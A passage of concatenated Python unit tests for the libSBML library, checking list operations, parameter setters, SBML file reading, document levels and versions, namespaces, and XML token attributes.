self.assert_( self.T.isSetPersistent() == 0 )
_dummyList = [ t ]; _dummyList[:] = []; del _dummyList
pass
def suite():
suite = unittest.TestSuite()
suite.addTest(unittest.makeSuite(TestL3Trigger))
return suite
if __name__ == "__main__":
if unittest.TextTestRunner(verbosity=1).run(suite()).wasSuccessful() :
sys.exit(0)
else:
sys.exit(1)
```
#### File: test/sbml/TestListOf.py
```python
import sys
import unittest
import libsbml
class TestListOf(unittest.TestCase):
def test_ListOf_append(self):
m = libsbml.Model(2,4)
m.createCompartment()
loc = m.getListOfCompartments()
self.assert_( loc.size() == 1 )
c = libsbml.Compartment(2,4)
i = loc.append(c)
self.assert_( i == libsbml.LIBSBML_OPERATION_SUCCESS )
self.assert_( loc.size() == 2 )
sp = libsbml.Species(2,4)
i = loc.append(sp)
self.assert_( i == libsbml.LIBSBML_INVALID_OBJECT )
self.assert_( loc.size() == 2 )
_dummyList = [ m ]; _dummyList[:] = []; del _dummyList
_dummyList = [ sp ]; _dummyList[:] = []; del _dummyList
pass
def test_ListOf_clear(self):
lo = libsbml.ListOf(2,4)
sp = libsbml.Species(2,4)
lo.append(sp)
lo.append(sp)
lo.append(sp)
lo.append(sp)
lo.append(sp)
self.assert_( lo.size() == 5 )
lo.clear(True)
self.assert_( lo.size() == 0 )
lo.append(sp)
lo.append(sp)
lo.append(sp)
lo.append(sp)
lo.appendAndOwn(sp)
self.assert_( lo.size() == 5 )
elem = lo.get(0)
_dummyList = [ elem ]; _dummyList[:] = []; del _dummyList
elem = lo.get(1)
_dummyList = [ elem ]; _dummyList[:] = []; del _dummyList
elem = lo.get(2)
_dummyList = [ elem ]; _dummyList[:] = []; del _dummyList
elem = lo.get(3)
_dummyList = [ elem ]; _dummyList[:] = []; del _dummyList
elem = lo.get(4)
_dummyList = [ elem ]; _dummyList[:] = []; del _dummyList
lo.clear(False)
self.assert_( lo.size() == 0 )
_dummyList = [ lo ]; _dummyList[:] = []; del _dummyList
pass
def test_ListOf_create(self):
lo = libsbml.ListOf(2,4)
self.assert_( lo.getTypeCode() == libsbml.SBML_LIST_OF )
self.assert_( lo.getNotes() == None )
self.assert_( lo.getAnnotation() == None )
self.assert_( lo.getMetaId() == "" )
self.assert_( lo.size() == 0 )
_dummyList = [ lo ]; _dummyList[:] = []; del _dummyList
pass
def test_ListOf_free_NULL(self):
_dummyList = [ None ]; _dummyList[:] = []; del _dummyList
pass
def test_ListOf_remove(self):
lo = libsbml.ListOf(2,4)
sp = libsbml.Species(2,4)
self.assert_( lo.size() == 0 )
lo.append(sp)
lo.append(sp)
lo.append(sp)
lo.append(sp)
lo.append(sp)
self.assert_( lo.size() == 5 )
elem = lo.remove(0)
_dummyList = [ elem ]; _dummyList[:] = []; del _dummyList
elem = lo.remove(0)
_dummyList = [ elem ]; _dummyList[:] = []; del _dummyList
elem = lo.remove(0)
_dummyList = [ elem ]; _dummyList[:] = []; del _dummyList
elem = lo.remove(0)
_dummyList = [ elem ]; _dummyList[:] = []; del _dummyList
elem = lo.remove(0)
_dummyList = [ elem ]; _dummyList[:] = []; del _dummyList
self.assert_( lo.size() == 0 )
lo.append(sp)
lo.append(sp)
lo.append(sp)
lo.append(sp)
lo.appendAndOwn(sp)
self.assert_( lo.size() == 5 )
_dummyList = [ lo ]; _dummyList[:] = []; del _dummyList
pass
def suite():
suite = unittest.TestSuite()
suite.addTest(unittest.makeSuite(TestListOf))
return suite
if __name__ == "__main__":
if unittest.TextTestRunner(verbosity=1).run(suite()).wasSuccessful() :
sys.exit(0)
else:
sys.exit(1)
```
#### File: test/sbml/TestParameter_newSetters.py
```python
import sys
import unittest
import libsbml
class TestParameter_newSetters(unittest.TestCase):
global P
P = None
def setUp(self):
self.P = libsbml.Parameter(1,2)
if (self.P == None):
pass
pass
def tearDown(self):
_dummyList = [ self.P ]; _dummyList[:] = []; del _dummyList
pass
def test_Parameter_setConstant1(self):
i = self.P.setConstant(False)
self.assert_( i == libsbml.LIBSBML_UNEXPECTED_ATTRIBUTE )
self.assert_( self.P.getConstant() == False )
pass
def test_Parameter_setConstant2(self):
p = libsbml.Parameter(2,2)
i = p.setConstant(False)
self.assert_( i == libsbml.LIBSBML_OPERATION_SUCCESS )
self.assert_( p.getConstant() == False )
_dummyList = [ p ]; _dummyList[:] = []; del _dummyList
pass
def test_Parameter_setId1(self):
i = self.P.setId( "1cell")
self.assert_( i == libsbml.LIBSBML_INVALID_ATTRIBUTE_VALUE )
self.assertEqual( False, self.P.isSetId() )
pass
def test_Parameter_setId2(self):
i = self.P.setId( "cell")
self.assert_( i == libsbml.LIBSBML_OPERATION_SUCCESS )
self.assertEqual( True, self.P.isSetId() )
self.assert_(( "cell" == self.P.getId() ))
i = self.P.setId("")
self.assert_( i == libsbml.LIBSBML_OPERATION_SUCCESS )
self.assertEqual( False, self.P.isSetId() )
pass
def test_Parameter_setName1(self):
i = self.P.setName( "cell")
self.assert_( i == libsbml.LIBSBML_OPERATION_SUCCESS )
self.assertEqual( True, self.P.isSetName() )
i = self.P.unsetName()
self.assert_( i == libsbml.LIBSBML_OPERATION_SUCCESS )
self.assertEqual( False, self.P.isSetName() )
pass
def test_Parameter_setName2(self):
p = libsbml.Parameter(2,2)
i = p.setName( "1cell")
self.assert_( i == libsbml.LIBSBML_OPERATION_SUCCESS )
self.assertEqual( True, p.isSetName() )
i = p.unsetName()
self.assert_( i == libsbml.LIBSBML_OPERATION_SUCCESS )
self.assertEqual( False, p.isSetName() )
_dummyList = [ p ]; _dummyList[:] = []; del _dummyList
pass
def test_Parameter_setName3(self):
p = libsbml.Parameter(1,2)
i = p.setName( "11pp")
self.assert_( i == libsbml.LIBSBML_INVALID_ATTRIBUTE_VALUE )
self.assertEqual( False, p.isSetName() )
i = p.setName("")
self.assert_( i == libsbml.LIBSBML_OPERATION_SUCCESS )
self.assertEqual( False, p.isSetName() )
_dummyList = [ p ]; _dummyList[:] = []; del _dummyList
pass
def test_Parameter_setUnits1(self):
i = self.P.setUnits( "1cell")
self.assert_( i == libsbml.LIBSBML_INVALID_ATTRIBUTE_VALUE )
self.assertEqual( False, self.P.isSetUnits() )
i = self.P.unsetUnits()
self.assert_( i == libsbml.LIBSBML_OPERATION_SUCCESS )
self.assertEqual( False, self.P.isSetUnits() )
pass
def test_Parameter_setUnits2(self):
i = self.P.setUnits( "litre")
self.assert_( i == libsbml.LIBSBML_OPERATION_SUCCESS )
self.assertEqual( True, self.P.isSetUnits() )
i = self.P.unsetUnits()
self.assert_( i == libsbml.LIBSBML_OPERATION_SUCCESS )
self.assertEqual( False, self.P.isSetUnits() )
pass
def test_Parameter_setUnits3(self):
i = self.P.setUnits("")
self.assert_( i == libsbml.LIBSBML_OPERATION_SUCCESS )
self.assertEqual( False, self.P.isSetUnits() )
pass
def test_Parameter_setValue1(self):
i = self.P.setValue(2.0)
self.assert_( i == libsbml.LIBSBML_OPERATION_SUCCESS )
self.assert_( self.P.getValue() == 2.0 )
self.assertEqual( True, self.P.isSetValue() )
i = self.P.unsetValue()
self.assert_( i == libsbml.LIBSBML_OPERATION_SUCCESS )
self.assertEqual( False, self.P.isSetValue() )
pass
def test_Parameter_setValue2(self):
p = libsbml.Parameter(2,2)
i = p.unsetValue()
self.assert_( i == libsbml.LIBSBML_OPERATION_SUCCESS )
self.assertEqual( False, p.isSetValue() )
_dummyList = [ p ]; _dummyList[:] = []; del _dummyList
pass
def suite():
suite = unittest.TestSuite()
suite.addTest(unittest.makeSuite(TestParameter_newSetters))
return suite
if __name__ == "__main__":
if unittest.TextTestRunner(verbosity=1).run(suite()).wasSuccessful() :
sys.exit(0)
else:
sys.exit(1)
```
#### File: test/sbml/TestReadFromFile1.py
```python
import sys
import unittest
import libsbml
class TestReadFromFile1(unittest.TestCase):
def test_read_l1v1_branch(self):
filename = "../../sbml/test/test-data/l1v1-branch.xml"
d = libsbml.readSBML(filename)
if (d == None):
pass
self.assert_( d.getLevel() == 1 )
self.assert_( d.getVersion() == 1 )
m = d.getModel()
self.assert_(( "Branch" == m.getName() ))
self.assert_( m.getNumCompartments() == 1 )
c = m.getCompartment(0)
self.assert_(( "compartmentOne" == c.getName() ))
self.assert_( c.getVolume() == 1 )
ud = c.getDerivedUnitDefinition()
self.assert_( ud.getNumUnits() == 1 )
self.assert_( ud.getUnit(0).getKind() == libsbml.UNIT_KIND_LITRE )
self.assert_( m.getNumSpecies() == 4 )
s = m.getSpecies(0)
self.assert_(( "S1" == s.getName() ))
self.assert_(( "compartmentOne" == s.getCompartment() ))
self.assert_( s.getInitialAmount() == 0 )
self.assert_( s.getBoundaryCondition() == False )
ud = s.getDerivedUnitDefinition()
self.assert_( ud.getNumUnits() == 2 )
self.assert_( ud.getUnit(0).getKind() == libsbml.UNIT_KIND_MOLE )
self.assert_( ud.getUnit(0).getExponent() == 1 )
self.assert_( ud.getUnit(1).getKind() == libsbml.UNIT_KIND_LITRE )
self.assert_( ud.getUnit(1).getExponent() == -1 )
s = m.getSpecies(1)
self.assert_(( "X0" == s.getName() ))
self.assert_(( "compartmentOne" == s.getCompartment() ))
self.assert_( s.getInitialAmount() == 0 )
self.assert_( s.getBoundaryCondition() == True )
s = m.getSpecies(2)
self.assert_(( "X1" == s.getName() ))
self.assert_(( "compartmentOne" == s.getCompartment() ))
self.assert_( s.getInitialAmount() == 0 )
self.assert_( s.getBoundaryCondition() == True )
s = m.getSpecies(3)
self.assert_(( "X2" == s.getName() ))
self.assert_(( "compartmentOne" == s.getCompartment() ))
self.assert_( s.getInitialAmount() == 0 )
self.assert_( s.getBoundaryCondition() == True )
self.assert_( m.getNumReactions() == 3 )
r = m.getReaction(0)
self.assert_(( "reaction_1" == r.getName() ))
self.assert_( r.getReversible() == False )
self.assert_( r.getFast() == False )
ud = r.getKineticLaw().getDerivedUnitDefinition()
self.assert_( ud.getNumUnits() == 2 )
self.assert_( ud.getUnit(0).getKind() == libsbml.UNIT_KIND_MOLE )
self.assert_( ud.getUnit(0).getExponent() == 1 )
self.assert_( ud.getUnit(1).getKind() == libsbml.UNIT_KIND_LITRE )
self.assert_( ud.getUnit(1).getExponent() == -1 )
self.assert_( r.getKineticLaw().containsUndeclaredUnits() == True )
r = m.getReaction(1)
self.assert_(( "reaction_2" == r.getName() ))
self.assert_( r.getReversible() == False )
self.assert_( r.getFast() == False )
r = m.getReaction(2)
self.assert_(( "reaction_3" == r.getName() ))
self.assert_( r.getReversible() == False )
self.assert_( r.getFast() == False )
r = m.getReaction(0)
self.assert_( r.getNumReactants() == 1 )
self.assert_( r.getNumProducts() == 1 )
sr = r.getReactant(0)
self.assert_(( "X0" == sr.getSpecies() ))
self.assert_( sr.getStoichiometry() == 1 )
self.assert_( sr.getDenominator() == 1 )
sr = r.getProduct(0)
self.assert_(( "S1" == sr.getSpecies() ))
self.assert_( sr.getStoichiometry() == 1 )
self.assert_( sr.getDenominator() == 1 )
kl = r.getKineticLaw()
self.assert_(( "k1 * X0" == kl.getFormula() ))
self.assert_( kl.getNumParameters() == 1 )
p = kl.getParameter(0)
self.assert_(( "k1" == p.getName() ))
self.assert_( p.getValue() == 0 )
r = m.getReaction(1)
self.assert_( r.getNumReactants() == 1 )
self.assert_( r.getNumProducts() == 1 )
sr = r.getReactant(0)
self.assert_(( "S1" == sr.getSpecies() ))
self.assert_( sr.getStoichiometry() == 1 )
self.assert_( sr.getDenominator() == 1 )
sr = r.getProduct(0)
self.assert_(( "X1" == sr.getSpecies() ))
self.assert_( sr.getStoichiometry() == 1 )
self.assert_( sr.getDenominator() == 1 )
kl = r.getKineticLaw()
self.assert_(( "k2 * S1" == kl.getFormula() ))
self.assert_( kl.getNumParameters() == 1 )
p = kl.getParameter(0)
self.assert_(( "k2" == p.getName() ))
self.assert_( p.getValue() == 0 )
r = m.getReaction(2)
self.assert_( r.getNumReactants() == 1 )
self.assert_( r.getNumProducts() == 1 )
sr = r.getReactant(0)
self.assert_(( "S1" == sr.getSpecies() ))
self.assert_( sr.getStoichiometry() == 1 )
self.assert_( sr.getDenominator() == 1 )
sr = r.getProduct(0)
self.assert_(( "X2" == sr.getSpecies() ))
self.assert_( sr.getStoichiometry() == 1 )
self.assert_( sr.getDenominator() == 1 )
kl = r.getKineticLaw()
self.assert_(( "k3 * S1" == kl.getFormula() ))
self.assert_( kl.getNumParameters() == 1 )
p = kl.getParameter(0)
self.assert_(( "k3" == p.getName() ))
self.assert_( p.getValue() == 0 )
_dummyList = [ d ]; _dummyList[:] = []; del _dummyList
pass
def suite():
suite = unittest.TestSuite()
suite.addTest(unittest.makeSuite(TestReadFromFile1))
return suite
if __name__ == "__main__":
if unittest.TextTestRunner(verbosity=1).run(suite()).wasSuccessful() :
sys.exit(0)
else:
sys.exit(1)
```
#### File: test/sbml/TestSBMLDocument.py
```python
import sys
import unittest
import libsbml
class TestSBMLDocument(unittest.TestCase):
def test_SBMLDocument_create(self):
d = libsbml.SBMLDocument()
self.assert_( d.getTypeCode() == libsbml.SBML_DOCUMENT )
self.assert_( d.getNotes() == None )
self.assert_( d.getAnnotation() == None )
self.assert_( d.getLevel() == 3 )
self.assert_( d.getVersion() == 1 )
self.assert_( d.getNumErrors() == 0 )
_dummyList = [ d ]; _dummyList[:] = []; del _dummyList
pass
def test_SBMLDocument_createWith(self):
d = libsbml.SBMLDocument(1,2)
self.assert_( d.getTypeCode() == libsbml.SBML_DOCUMENT )
self.assert_( d.getNotes() == None )
self.assert_( d.getAnnotation() == None )
self.assert_( d.getLevel() == 1 )
self.assert_( d.getVersion() == 2 )
self.assert_( d.getNumErrors() == 0 )
_dummyList = [ d ]; _dummyList[:] = []; del _dummyList
pass
def test_SBMLDocument_free_NULL(self):
_dummyList = [ None ]; _dummyList[:] = []; del _dummyList
pass
def test_SBMLDocument_setLevelAndVersion(self):
d = libsbml.SBMLDocument(2,2)
m1 = libsbml.Model(2,2)
d.setModel(m1)
self.assert_( d.setLevelAndVersion(2,3,False) == True )
self.assert_( d.setLevelAndVersion(2,1,False) == True )
self.assert_( d.setLevelAndVersion(1,2,False) == True )
self.assert_( d.setLevelAndVersion(1,1,False) == False )
_dummyList = [ d ]; _dummyList[:] = []; del _dummyList
pass
def test_SBMLDocument_setLevelAndVersion_Error(self):
d = libsbml.SBMLDocument()
d.setLevelAndVersion(2,1,True)
m1 = libsbml.Model(2,1)
u = libsbml.Unit(2,1)
u.setKind(libsbml.UnitKind_forName("mole"))
u.setOffset(3.2)
ud = libsbml.UnitDefinition(2,1)
ud.setId( "ud")
ud.addUnit(u)
m1.addUnitDefinition(ud)
d.setModel(m1)
self.assert_( d.setLevelAndVersion(2,2,True) == False )
self.assert_( d.setLevelAndVersion(2,3,True) == False )
self.assert_( d.setLevelAndVersion(1,2,True) == False )
self.assert_( d.setLevelAndVersion(1,1,True) == False )
_dummyList = [ d ]; _dummyList[:] = []; del _dummyList
pass
def test_SBMLDocument_setLevelAndVersion_UnitsError(self):
d = libsbml.SBMLDocument()
d.setLevelAndVersion(2,4,False)
m1 = d.createModel()
c = m1.createCompartment()
c.setId( "c")
p = m1.createParameter()
p.setId( "p")
p.setUnits( "mole")
r = m1.createAssignmentRule()
r.setVariable( "c")
r.setFormula( "p*p")
self.assert_( d.setLevelAndVersion(2,2,False) == True )
self.assert_( d.setLevelAndVersion(2,3,False) == True )
self.assert_( d.setLevelAndVersion(1,2,False) == True )
self.assert_( d.setLevelAndVersion(1,1,False) == False )
_dummyList = [ d ]; _dummyList[:] = []; del _dummyList
pass
def test_SBMLDocument_setLevelAndVersion_Warning(self):
d = libsbml.SBMLDocument(2,2)
m1 = libsbml.Model(2,2)
(m1).setSBOTerm(2)
d.setModel(m1)
self.assert_( d.setLevelAndVersion(2,3,False) == True )
self.assert_( d.setLevelAndVersion(2,1,False) == True )
self.assert_( d.setLevelAndVersion(1,2,False) == True )
self.assert_( d.setLevelAndVersion(1,1,False) == False )
_dummyList = [ d ]; _dummyList[:] = []; del _dummyList
pass
def test_SBMLDocument_setModel(self):
d = libsbml.SBMLDocument(2,4)
m1 = libsbml.Model(2,4)
m2 = libsbml.Model(2,4)
self.assert_( d.getModel() == None )
i = d.setModel(m1)
self.assert_( i == libsbml.LIBSBML_OPERATION_SUCCESS )
mout = d.getModel()
self.assert_( mout != None )
self.assert_( mout != m1 )
i = d.setModel(d.getModel())
self.assert_( i == libsbml.LIBSBML_OPERATION_SUCCESS )
mout = d.getModel()
self.assert_( mout != None )
self.assert_( mout != m1 )
i = d.setModel(m2)
self.assert_( i == libsbml.LIBSBML_OPERATION_SUCCESS )
mout = d.getModel()
self.assert_( mout != None )
self.assert_( mout != m2 )
_dummyList = [ d ]; _dummyList[:] = []; del _dummyList
pass
def test_SBMLDocument_setModel1(self):
d = libsbml.SBMLDocument(2,2)
m1 = libsbml.Model(2,1)
i = d.setModel(m1)
self.assert_( i == libsbml.LIBSBML_VERSION_MISMATCH )
self.assert_( d.getModel() == None )
_dummyList = [ d ]; _dummyList[:] = []; del _dummyList
pass
def test_SBMLDocument_setModel2(self):
d = libsbml.SBMLDocument(2,2)
m1 = libsbml.Model(1,2)
m1.createCompartment()
i = d.setModel(m1)
self.assert_( i == libsbml.LIBSBML_LEVEL_MISMATCH )
self.assert_( d.getModel() == None )
_dummyList = [ d ]; _dummyList[:] = []; del _dummyList
pass
def test_SBMLDocument_setModel3(self):
d = libsbml.SBMLDocument(2,2)
m1 = libsbml.Model(2,2)
i = d.setModel(m1)
self.assert_( i == libsbml.LIBSBML_OPERATION_SUCCESS )
self.assert_( d.getModel() != None )
_dummyList = [ d ]; _dummyList[:] = []; del _dummyList
pass
def suite():
suite = unittest.TestSuite()
suite.addTest(unittest.makeSuite(TestSBMLDocument))
return suite
if __name__ == "__main__":
if unittest.TextTestRunner(verbosity=1).run(suite()).wasSuccessful() :
sys.exit(0)
else:
sys.exit(1)
```
#### File: test/sbml/TestSBMLNamespaces.py
```python
import sys
import unittest
import libsbml
class TestSBMLNamespaces(unittest.TestCase):
def test_SBMLNamespaces_L1V1(self):
sbml = libsbml.SBMLNamespaces(1,1)
self.assert_( sbml.getLevel() == 1 )
self.assert_( sbml.getVersion() == 1 )
ns = sbml.getNamespaces()
self.assert_( ns.getLength() == 1 )
self.assert_( ns.getURI(0) == "http://www.sbml.org/sbml/level1" )
self.assert_( ns.getPrefix(0) == "" )
sbml = None
pass
def test_SBMLNamespaces_L1V2(self):
sbml = libsbml.SBMLNamespaces(1,2)
self.assert_( sbml.getLevel() == 1 )
self.assert_( sbml.getVersion() == 2 )
ns = sbml.getNamespaces()
self.assert_( ns.getLength() == 1 )
self.assert_( ns.getURI(0) == "http://www.sbml.org/sbml/level1" )
self.assert_( ns.getPrefix(0) == "" )
sbml = None
pass
def test_SBMLNamespaces_L2V1(self):
sbml = libsbml.SBMLNamespaces(2,1)
self.assert_( sbml.getLevel() == 2 )
self.assert_( sbml.getVersion() == 1 )
ns = sbml.getNamespaces()
self.assert_( ns.getLength() == 1 )
self.assert_( ns.getURI(0) == "http://www.sbml.org/sbml/level2" )
self.assert_( ns.getPrefix(0) == "" )
sbml = None
pass
def test_SBMLNamespaces_L2V2(self):
sbml = libsbml.SBMLNamespaces(2,2)
self.assert_( sbml.getLevel() == 2 )
self.assert_( sbml.getVersion() == 2 )
ns = sbml.getNamespaces()
self.assert_( ns.getLength() == 1 )
self.assert_( ns.getURI(0) == "http://www.sbml.org/sbml/level2/version2" )
self.assert_( ns.getPrefix(0) == "" )
sbml = None
pass
def test_SBMLNamespaces_L2V3(self):
sbml = libsbml.SBMLNamespaces(2,3)
self.assert_( sbml.getLevel() == 2 )
self.assert_( sbml.getVersion() == 3 )
ns = sbml.getNamespaces()
self.assert_( ns.getLength() == 1 )
self.assert_( ns.getURI(0) == "http://www.sbml.org/sbml/level2/version3" )
self.assert_( ns.getPrefix(0) == "" )
sbml = None
pass
def test_SBMLNamespaces_L2V4(self):
sbml = libsbml.SBMLNamespaces(2,4)
self.assert_( sbml.getLevel() == 2 )
self.assert_( sbml.getVersion() == 4 )
ns = sbml.getNamespaces()
self.assert_( ns.getLength() == 1 )
self.assert_( ns.getURI(0) == "http://www.sbml.org/sbml/level2/version4" )
self.assert_( ns.getPrefix(0) == "" )
sbml = None
pass
def test_SBMLNamespaces_L3V1(self):
sbml = libsbml.SBMLNamespaces(3,1)
self.assert_( sbml.getLevel() == 3 )
self.assert_( sbml.getVersion() == 1 )
ns = sbml.getNamespaces()
self.assert_( ns.getLength() == 1 )
self.assert_( ns.getURI(0) == "http://www.sbml.org/sbml/level3/version1/core" )
self.assert_( ns.getPrefix(0) == "" )
sbml = None
pass
def test_SBMLNamespaces_add_and_remove_namespaces(self):
sbmlns = libsbml.SBMLNamespaces( 3,1 )
self.assert_( sbmlns.getLevel() == 3 )
self.assert_( sbmlns.getVersion() == 1 )
sbmlns.addNamespace("http://www.sbml.org/sbml/level3/version1/group/version1", "group")
sbmlns.addNamespace("http://www.sbml.org/sbml/level3/version1/layout/version1", "layout")
sbmlns.addNamespace("http://www.sbml.org/sbml/level3/version1/render/version1", "render")
sbmlns.addNamespace("http://www.sbml.org/sbml/level3/version1/multi/version1", "multi")
ns = sbmlns.getNamespaces()
self.assert_( ns.getLength() == 5 )
self.assert_( ns.getURI(0) == "http://www.sbml.org/sbml/level3/version1/core" )
self.assert_( ns.getPrefix(0) == "" )
self.assert_( ns.getURI(1) == "http://www.sbml.org/sbml/level3/version1/group/version1" )
self.assert_( ns.getPrefix(1) == "group" )
self.assert_( ns.getURI(2) == "http://www.sbml.org/sbml/level3/version1/layout/version1" )
self.assert_( ns.getPrefix(2) == "layout" )
self.assert_( ns.getURI(3) == "http://www.sbml.org/sbml/level3/version1/render/version1" )
self.assert_( ns.getPrefix(3) == "render" )
self.assert_( ns.getURI(4) == "http://www.sbml.org/sbml/level3/version1/multi/version1" )
self.assert_( ns.getPrefix(4) == "multi" )
sbmlns.removeNamespace("http://www.sbml.org/sbml/level3/version1/layout/version1")
sbmlns.removeNamespace("http://www.sbml.org/sbml/level3/version1/group/version1")
sbmlns.removeNamespace("http://www.sbml.org/sbml/level3/version1/render/version1")
sbmlns.removeNamespace("http://www.sbml.org/sbml/level3/version1/multi/version1")
pass
def test_SBMLNamespaces_getURI(self):
self.assert_( libsbml.SBMLNamespaces.getSBMLNamespaceURI(1,1) == "http://www.sbml.org/sbml/level1" )
self.assert_( libsbml.SBMLNamespaces.getSBMLNamespaceURI(1,2) == "http://www.sbml.org/sbml/level1" )
self.assert_( libsbml.SBMLNamespaces.getSBMLNamespaceURI(2,1) == "http://www.sbml.org/sbml/level2" )
self.assert_( libsbml.SBMLNamespaces.getSBMLNamespaceURI(2,2) == "http://www.sbml.org/sbml/level2/version2" )
self.assert_( libsbml.SBMLNamespaces.getSBMLNamespaceURI(2,3) == "http://www.sbml.org/sbml/level2/version3" )
self.assert_( libsbml.SBMLNamespaces.getSBMLNamespaceURI(2,4) == "http://www.sbml.org/sbml/level2/version4" )
self.assert_( libsbml.SBMLNamespaces.getSBMLNamespaceURI(3,1) == "http://www.sbml.org/sbml/level3/version1/core" )
pass
def suite():
suite = unittest.TestSuite()
suite.addTest(unittest.makeSuite(TestSBMLNamespaces))
return suite
if __name__ == "__main__":
if unittest.TextTestRunner(verbosity=1).run(suite()).wasSuccessful() :
sys.exit(0)
else:
sys.exit(1)
```
#### File: test/xml/TestXMLToken_newSetters.py
```python
import sys
import unittest
import libsbml
class TestXMLToken_newSetters(unittest.TestCase):
def test_XMLToken_newSetters_addAttributes1(self):
triple = libsbml.XMLTriple("test","","")
attr = libsbml.XMLAttributes()
token = libsbml.XMLToken(triple,attr)
xt2 = libsbml.XMLTriple("name3", "http://name3.org/", "p3")
i = token.addAttr( "name1", "val1")
self.assert_( i == libsbml.LIBSBML_OPERATION_SUCCESS )
self.assert_( token.getAttributesLength() == 1 )
self.assert_( token.isAttributesEmpty() == False )
self.assert_( ( "name1" != token.getAttrName(0) ) == False )
self.assert_( ( "val1" != token.getAttrValue(0) ) == False )
i = token.addAttr( "name2", "val2", "http://name1.org/", "p1")
self.assert_( i == libsbml.LIBSBML_OPERATION_SUCCESS )
self.assert_( token.getAttributesLength() == 2 )
self.assert_( token.isAttributesEmpty() == False )
self.assert_( ( "name2" != token.getAttrName(1) ) == False )
self.assert_( ( "val2" != token.getAttrValue(1) ) == False )
self.assert_( ( "http://name1.org/" != token.getAttrURI(1) ) == False )
self.assert_( ( "p1" != token.getAttrPrefix(1) ) == False )
i = token.addAttr(xt2, "val2")
self.assert_( i == libsbml.LIBSBML_OPERATION_SUCCESS )
self.assert_( token.getAttributesLength() == 3 )
self.assert_( token.isAttributesEmpty() == False )
self.assert_( ( "name3" != token.getAttrName(2) ) == False )
self.assert_( ( "val2" != token.getAttrValue(2) ) == False )
self.assert_( ( "http://name3.org/" != token.getAttrURI(2) ) == False )
self.assert_( ( "p3" != token.getAttrPrefix(2) ) == False )
_dummyList = [ xt2 ]; _dummyList[:] = []; del _dummyList
_dummyList = [ triple ]; _dummyList[:] = []; del _dummyList
_dummyList = [ attr ]; _dummyList[:] = []; del _dummyList
_dummyList = [ token ]; _dummyList[:] = []; del _dummyList
pass
def test_XMLToken_newSetters_addAttributes2(self):
triple = libsbml.XMLTriple("test","","")
token = libsbml.XMLToken(triple)
xt2 = libsbml.XMLTriple("name3", "http://name3.org/", "p3")
i = token.addAttr( "name1", "val1")
self.assert_( i == libsbml.LIBSBML_INVALID_XML_OPERATION )
self.assert_( token.getAttributesLength() == 0 )
self.assert_( token.isAttributesEmpty() == True )
i = token.addAttr( "name2", "val2", "http://name1.org/", "p1")
self.assert_( i == libsbml.LIBSBML_INVALID_XML_OPERATION )
self.assert_( token.getAttributesLength() == 0 )
self.assert_( token.isAttributesEmpty() == True )
i = token.addAttr(xt2, "val2")
self.assert_( i == libsbml.LIBSBML_INVALID_XML_OPERATION )
self.assert_( token.getAttributesLength() == 0 )
self.assert_( token.isAttributesEmpty() == True )
_dummyList = [ xt2 ]; _dummyList[:] = []; del _dummyList
_dummyList = [ triple ]; _dummyList[:] = []; del _dummyList
_dummyList = [ token ]; _dummyList[:] = []; del _dummyList
pass
def test_XMLToken_newSetters_addNamespaces1(self):
triple = libsbml.XMLTriple("test","","")
attr = libsbml.XMLAttributes()
token = libsbml.XMLToken(triple,attr)
self.assert_( token.getNamespacesLength() == 0 )
self.assert_( token.isNamespacesEmpty() == True )
i = token.addNamespace( "http://test1.org/", "test1")
self.assert_( i == libsbml.LIBSBML_OPERATION_SUCCESS )
self.assert_( token.getNamespacesLength() == 1 )
self.assert_( token.isNamespacesEmpty() == False )
_dummyList = [ attr ]; _dummyList[:] = []; del _dummyList
_dummyList = [ triple ]; _dummyList[:] = []; del _dummyList
_dummyList = [ token ]; _dummyList[:] = []; del _dummyList
pass
def test_XMLToken_newSetters_addNamespaces2(self):
triple = libsbml.XMLTriple("test","","")
token = libsbml.XMLToken(triple)
self.assert_( token.getNamespacesLength() == 0 )
self.assert_( token.isNamespacesEmpty() == True )
i = token.addNamespace( "http://test1.org/", "test1")
self.assert_( i == libsbml.LIBSBML_INVALID_XML_OPERATION )
self.assert_( token.getNamespacesLength() == 0 )
self.assert_( token.isNamespacesEmpty() == True )
_dummyList = [ triple ]; _dummyList[:] = []; del _dummyList
_dummyList = [ token ]; _dummyList[:] = []; del _dummyList
pass
def test_XMLToken_newSetters_clearAttributes1(self):
triple = libsbml.XMLTriple("test","","")
attr = libsbml.XMLAttributes()
token = libsbml.XMLToken(triple,attr)
nattr = libsbml.XMLAttributes()
xt1 = libsbml.XMLTriple("name1", "http://name1.org/", "p1")
nattr.add(xt1, "val1")
i = token.setAttributes(nattr)
self.assert_( i == libsbml.LIBSBML_OPERATION_SUCCESS )
self.assert_( token.isAttributesEmpty() == False )
i = token.clearAttributes()
self.assert_( i == libsbml.LIBSBML_OPERATION_SUCCESS )
self.assert_( token.isAttributesEmpty() == True )
_dummyList = [ nattr ]; _dummyList[:] = []; del _dummyList
_dummyList = [ attr ]; _dummyList[:] = []; del _dummyList
_dummyList = [ triple ]; _dummyList[:] = []; del _dummyList
_dummyList = [ token ]; _dummyList[:] = []; del _dummyList
_dummyList = [ xt1 ]; _dummyList[:] = []; del _dummyList
pass
def test_XMLToken_newSetters_clearNamespaces1(self):
triple = libsbml.XMLTriple("test","","")
attr = libsbml.XMLAttributes()
token = libsbml.XMLToken(triple,attr)
ns = libsbml.XMLNamespaces()
self.assert_( token.getNamespacesLength() == 0 )
self.assert_( token.isNamespacesEmpty() == True )
ns.add( "http://test1.org/", "test1")
i = token.setNamespaces(ns)
self.assert_( i == libsbml.LIBSBML_OPERATION_SUCCESS )
self.assert_( token.getNamespacesLength() == 1 )
self.assert_( token.isNamespacesEmpty() == False )
i = token.clearNamespaces()
self.assert_( i == libsbml.LIBSBML_OPERATION_SUCCESS )
self.assert_( token.getNamespacesLength() == 0 )
self.assert_( token.isNamespacesEmpty() == True )
_dummyList = [ attr ]; _dummyList[:] = []; del _dummyList
_dummyList = [ triple ]; _dummyList[:] = []; del _dummyList
_dummyList = [ token ]; _dummyList[:] = []; del _dummyList
_dummyList = [ ns ]; _dummyList[:] = []; del _dummyList
pass
def test_XMLToken_newSetters_removeAttributes1(self):
triple = libsbml.XMLTriple("test","","")
attr = libsbml.XMLAttributes()
token = libsbml.XMLToken(triple,attr)
xt2 = libsbml.XMLTriple("name3", "http://name3.org/", "p3")
xt1 = libsbml.XMLTriple("name5", "http://name5.org/", "p5")
i = token.addAttr( "name1", "val1")
i = token.addAttr( "name2", "val2", "http://name1.org/", "p1")
i = token.addAttr(xt2, "val2")
i = token.addAttr( "name4", "val4")
self.assert_( token.getAttributes().getLength() == 4 )
i = token.removeAttr(7)
